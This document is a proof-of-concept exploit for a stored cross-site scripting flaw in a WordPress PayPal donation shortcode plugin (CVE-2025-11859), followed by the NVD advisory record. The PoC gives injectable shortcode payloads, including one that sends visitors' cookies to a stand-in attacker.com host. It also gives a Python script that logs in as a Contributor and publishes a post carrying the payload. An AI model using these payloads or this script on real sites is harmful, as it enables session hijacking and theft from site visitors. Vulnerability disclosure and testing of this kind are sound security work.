CVE-2025-11859

WordPress Stored XSS via PayPal Donation Shortcode // PoC: Inject malicious shortcode into WordPress post/page // Requires Contributor-level access or higher [paypal title='<script>alert(String.fromCharCode(88,83,83))</script>' text='<img src=x onerror=alert(document.domain)>'] // Alternative payload - Cookie stealing [paypal title='<script>document.location="https://attacker.com/steal?c="+document.cookie</script>' text='Donate Now'] // When rendered, the unsanitized input is directly output to HTML: // <div class="paypal-donation"> // <h3><script>alert(String.fromCharCode(88,83,83))</script></h3> // <p><img src=x onerror=alert(document.domain)></p> // </div> // Python PoC to detect the vulnerability import requests TARGET_URL = "http://target-wordpress-site.com/" LOGIN_URL = TARGET_URL + "wp-login.php" POST_ENDPOINT = TARGET_URL + "wp-json/wp/v2/posts" session = requests.Session() # Step 1: Authenticate with Contributor account login_data = { "log": "attacker_username", "pwd": "attacker_password" } session.post(LOGIN_URL, data=login_data) # Step 2: Create post with malicious shortcode post_data = { "title": "XSS Test Post", "content": "[paypal title='<script>alert(document.domain)</script>']", "status": "publish" } response = session.post(POST_ENDPOINT, json=post_data) # Step 3: Verify XSS payload is stored and executed post_id = response.json().get('id') page_url = TARGET_URL + "?p=" + str(post_id) print(f"Visit this URL to trigger XSS: {page_url}")

{"cve": {"id": "CVE-2025-11859", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:43.103", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Paypal Donation Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'paypal' shortcode in all versions up to, and including, 0.1. This is due to the plugin not properly sanitizing user input and output of the 'title' and 'text' parameters. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/paypal-donation-shortcode/tags/0.1/paypal-donation-shortcode.php#L23", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b66ab7c4-7963-424f-afec-0e52b987c6b3?source=cve", "source": "[email protected]"}]}}